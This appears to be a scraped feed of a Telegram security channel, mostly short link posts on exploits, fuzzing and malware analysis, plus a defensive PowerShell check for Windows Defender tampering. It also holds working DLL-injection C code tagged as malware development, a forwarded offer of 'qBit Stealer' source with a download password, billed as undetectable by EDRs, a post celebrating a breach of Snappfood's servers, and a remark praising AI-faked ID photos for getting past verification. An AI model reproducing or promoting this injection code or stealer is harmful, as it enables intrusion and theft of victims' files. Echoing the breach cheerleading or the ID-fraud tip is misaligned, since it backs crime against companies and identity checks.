great burpsuite series by Meraj Heydari
credit : @meraj_heydari
language : persian
https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-
#burpsuite ,
———
@islemolecule_source
exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250)
credit: @saidelike
research.nccgroup.com/2022/0…
#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source
DLL Injection classic way
:)
1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    int main(int argc, char *argv[]) {
        HANDLE processHandle;
        PVOID remoteBuffer;
        // path of the DLL the remote thread will load (wide string, since LoadLibraryW is used)
        wchar_t dllPath[] = L"C:\\experiments\\evilm64.dll";
        if (argc < 2) {
            printf("usage: %s <pid>\n", argv[0]);
            return 1;
        }
        printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
        // 1- open the target process
        processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)atoi(argv[1]));
        // 2- allocate a buffer in the target process
        remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
        // 3- write the DLL path into that buffer
        WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
        // 4- run LoadLibraryW in the target with the buffer as its argument
        PTHREAD_START_ROUTINE threadStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
        CreateRemoteThread(processHandle, NULL, 0, threadStartRoutineAddress, remoteBuffer, 0, NULL);
        CloseHandle(processHandle);
        return 0;
    }

iredteam
#malware_dev
@islemolecule_source
Forwarded from .....
But a few months ago, we informed Snapfood indirectly about the existence of vulnerabilities.
Snapfood servers were vulnerable and we had access to jira.snappfood.ir and jira.snapp.ir, ... for months and warned about them, but they didn't pay attention.
In this post, we thank the elites of SnapFood
بهنام نصراللهی
مهدی شکری
سپهر رشادی
According to our and other people's warnings, we are happy about what happened to SnappFood!
Initial Access – search-ms URI Handler
credit : @hackerfantastic
https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/
#initial_access ,
———
@islemolecule_source
SQL Brute Force Leads to BlueSky Ransomware
credit : @1ZRR4H
https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
———
@islemolecule_source
Rust to Assembly: Understanding the Inner Workings of Rust. A collection of blog posts showing how Rust code maps to assembly.
https://eventhelix.com/rust/
#rust
———
@islemolecule_source
Fuzz Everything, Everywhere, All at Once - Advanced QEMU-based fuzzing
https://media.ccc.de/v/37c3-12102-fuzz_everything_everywhere_all_at_once
#fuzzing #LibAFL #QEMU
———
@islemolecule_source
We see a lot of threat actors in our Incident Response cases who disable or tamper with the local AV.
The website http://privacy.sexy has a copy & paste script to turn off most of Defender's features. [1] How many of these modifications (or deactivations) will trigger an alert in your environment?
@DebugPrivilege has written an excellent article about the various event logs Windows Defender creates, and in which event. [2]
Run the commands on a test system, and look for gaps in your monitoring.
[1] https://privacy.sexy
[2] https://m365internals.com/2021/07/05/why-are-windows-defender-av-logs-so-important-and-how-to-monitor-them-with-azure-sentinel/
credit : @malmoeb
#AV ,
———
@islemolecule_source
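One way to do that gap check after running the script on a lab machine, as an added example (not part of @malmoeb's post or the linked article): it compares the current Defender preferences against a baseline you expect, then pulls the configuration and tamper events from the Defender operational log. The event IDs used are assumed from the Microsoft-Windows-Windows Defender/Operational log (5001, 5004, 5007, 5010, 5012, 5013) and the baseline values are an assumption you should adjust to your own policy.

```powershell
# Added example: audit Defender state and recent tamper-related events.
# Baseline is an assumption; adjust to the policy you actually deploy.
$expected = @{
    DisableRealtimeMonitoring = $false
    DisableBehaviorMonitoring = $false
    DisableIOAVProtection     = $false
    DisableScriptScanning     = $false
    DisableBlockAtFirstSeen   = $false
    MAPSReporting             = 2   # Advanced
    SubmitSamplesConsent      = 1   # SendSafeSamples
}

# 1. Compare live preferences with the baseline.
$pref = Get-MpPreference
foreach ($name in $expected.Keys) {
    $actual = $pref.$name
    if ("$actual" -ne "$($expected[$name])") {
        Write-Warning "Get-MpPreference.$name is '$actual' (expected '$($expected[$name])')"
    }
}

# 2. Sanity-check the running state, not just the stored preference.
$status = Get-MpComputerStatus
if (-not $status.RealTimeProtectionEnabled) { Write-Warning 'Real-time protection is OFF' }
if (-not $status.IsTamperProtected)        { Write-Warning 'Tamper protection is OFF' }

# 3. List what Defender itself logged about configuration changes in the last 24 h.
# Assumed IDs: 5001 real-time protection disabled, 5004 real-time protection config changed,
# 5007 platform configuration changed, 5010 malware scanning disabled,
# 5012 virus scanning disabled, 5013 tamper protection blocked a change.
$since  = (Get-Date).AddHours(-24)
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 5001, 5004, 5007, 5010, 5012, 5013
    StartTime = $since
} -ErrorAction SilentlyContinue

"$(@($events).Count) Defender configuration/tamper events since $since"
$events |
    Select-Object TimeCreated, Id,
        @{ n = 'Message'; e = { ($_.Message -split "`n")[0] } } |
    Format-Table -AutoSize
```

Every change the privacy.sexy script made that shows up neither in this event list nor in your SIEM is a monitoring gap worth a detection rule.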
• Realistic “photos” generated by AI were published on Reddit, and they are great for identity verification)) In one photo there is a girl with a sign, and in the second, with an ID card.
LINK
#informative
VirtualBox internals and exploitation (CVE-2023-21987 and CVE-2023-21991)
credit : @qriousec
https://qriousec.github.io/post/vbox-pwn2own-2023/
#virtualbox , #analysis ,
———
@islemolecule_source
Tackling Anti-Analysis Techniques of GuLoader and RedLine Stealer
Link
#malware_analysis
@islemolecule_source
exploits_rootkits_in_browser_extensions.pdf
Exploits and rootkits in your browser extensions
DEFCON 2021.
Forwarded from BlankRoom
Source Code qBit Stealer
Hello, qBit Stealer is a stealer malware designed with the red teamer in mind. It is completely written in Go, not detectable by EDRs, and is capable of uploading any file to a locker of your choice, utilizing a cutting-edge concurrency engine to upload as fast as possible.
Download
Password : blankroom
@Bl4nk_Room
Enjoy!